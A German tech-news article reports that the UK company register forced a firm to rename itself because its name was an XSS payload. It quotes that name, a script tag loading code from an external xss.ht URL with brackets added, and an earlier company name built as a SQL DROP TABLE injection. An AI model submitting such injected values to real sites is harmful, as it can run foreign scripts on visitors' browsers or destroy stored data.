HTML: Firmenname wegen Sicherheitslücke untersagt

Eine britische Firma musste ihren Namen ändern, weil er Code in Webseiten injizieren konnte.

Artikel veröffentlicht am ,
Quellcode einer Webseite
Quellcode einer Webseite (Bild: Pexels/Pixabay)

Die britische Behörde Companies House, die für das dortige Handelsregister zuständig ist, hat eine Firma gezwungen, ihren Namen zu ändern, da dieser ein Sicherheitsrisiko darstellen kann. Der Firmenname bestand aus HTML-Code, der wie ein klassischer Cross-Site-Scripting-Angriff (XSS) aufgebaut war und das Ausführen von Javascript-Code im Kontext einer Webseite ermöglichen konnte - darunter die Webseite der britischen Behörde.

Stellenmarkt
  1. Informatiker (m/w/d) für IT Servicedesk - IT Helpdesk/IT Support 1st + 2nd Level
    Rail Power Systems GmbH, München
  2. Ingenieur (m/w/d) Netzberechnung Datenhaltung
    Amprion GmbH, Pulheim
Detailsuche

Er habe den Firmennamen nicht etwa gewählt, um die Webseite des Companies House anzugreifen, vielmehr hielt er ihn für "einen lustigen, verspielten Namen" für sein Beratungsunternehmen, erklärte der Firmengründer der britischen Zeitung Guardian. Das kann man sich bei dem ursprünglichen Firmennamen aber fast nicht vorstellen (Name zum Schutz mit Klammern):

"><[SCRIPT] SRC[=]HTTPS://MJT.XSS.HT> LTD

Golem Akademie
  1. Kubernetes Dive-in-Workshop: virtueller Drei-Tage-Workshop
    19.-21.07.2022, Virtuell
  2. Kubernetes – das Container Orchestration Framework: virtueller Vier-Tage-Workshop
    11.-14.07.2022, Virtuell
Weitere IT-Trainings

Wird der HTML-Code, nichts anderes ist der Firmenname, nicht ordentlich validiert und in einem HTML-Element in einer Webseite ausgegeben, wird ein Skript von der URL im Firmennamen im Kontext der Webseite ausgeführt. Das hinterlegte Skript habe nur eine harmlose Warnung ausgegeben, schreibt der Guardian. Allerdings hätte es auch zu einem späteren Zeitpunkt für Angriffe genutzt werden können.

Nun wurde die Firma in "That Company whose Name used to contain HTML Script Tags LTD" (zu Deutsch: die Firma, deren Name früher HTML-Script-Tags enthielt LTD) umbenannt. Es ist nicht das erste Mal, dass ein Firmenname Code enthält, so sollte der Firmenname "; DROP TABLE "COMPANIES";-- LTD" mittels eines SQL-Befehls Inhalte der Datenbank löschen. Allerdings wurden die Firmen laut dem Guardian nicht zu einer Namensänderung gezwungen. Auf der Webseite der Behörde Companies House werde statt des Namens schlicht "Name der Firma auf Anfrage erhältlich" ausgegeben.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed


Tubes 16. Nov 2020

Die bessere Frage lautet, seit wann nicht mehr?

MountWalker 12. Nov 2020

Doch, genau das und wäre das nicht so, würdest du heute Protoindoeuropäisch* reden und...

mtr (golem.de) 10. Nov 2020

Hallo, Danke für den Hinweis. Ich hatte das extra über HTML-Entities eingebaut, damit...

TurbinenBewunderer 10. Nov 2020

Schon lustig. Die trauen wohl den eigenen Entwicklern nicht.



Aktuell auf der Startseite von Golem.de
Sicherheitslücke
Die Schadsoftware, die auf ausgeschalteten iPhones aktiv ist

Forschern ist es gelungen, eine Schadsoftware auf ausgeschalteten iPhones mit vermeintlich leerem Akku auszuführen. Denn ganz aus sind diese nicht.

Sicherheitslücke: Die Schadsoftware, die auf ausgeschalteten iPhones aktiv ist
Artikel
  1. Umweltschutz: Leipziger Forscher entdecken Enzym für Plastikrecycling
    Umweltschutz
    Leipziger Forscher entdecken Enzym für Plastikrecycling

    Ein neu entdecktes Enzym soll das biologische Recycling von Kunststoff deutlich beschleunigen.

  2. Bundeswehr: Das Heer will sich nicht abhören lassen
    Bundeswehr
    Das Heer will sich nicht abhören lassen

    Um sicher zu kommunizieren, halten die Landstreitkräfte in NATO-Missionen angeblich ihre Panzer an und verabreden sich "von Turm zu Turm".
    Ein Bericht von Matthias Monroy

  3. Beschäftigte: Microsoft wird Prämien und Aktienoptionen stark erhöhen
    Beschäftigte
    Microsoft wird Prämien und Aktienoptionen stark erhöhen

    Microsoft muss, um seine Experten zu halten, deutlich mehr für Prämien und Aktienoptionen ausgeben. Meta hatte einigen das doppelte Gehalt geboten.

Du willst dich mit Golem.de beruflich verändern oder weiterbilden?
Zum Stellenmarkt
Zur Akademie
Zum Coaching
  • Schnäppchen, Rabatte und Top-Angebote
    Die besten Deals des Tages
    Daily Deals • Cyber Week: Bis zu 400€ Rabatt auf Gaming-Stühle • AOC G3 Gaming-Monitor 34" UWQHD 165 Hz günstig wie nie: 404€ • Xbox Series X bestellbar • MindStar (u.a. Gigabyte RTX 3090 24GB 1.699€) • LG OLED TV (2021) 65" 120 Hz 1.499€ statt 2.799€ [Werbung]
    •  /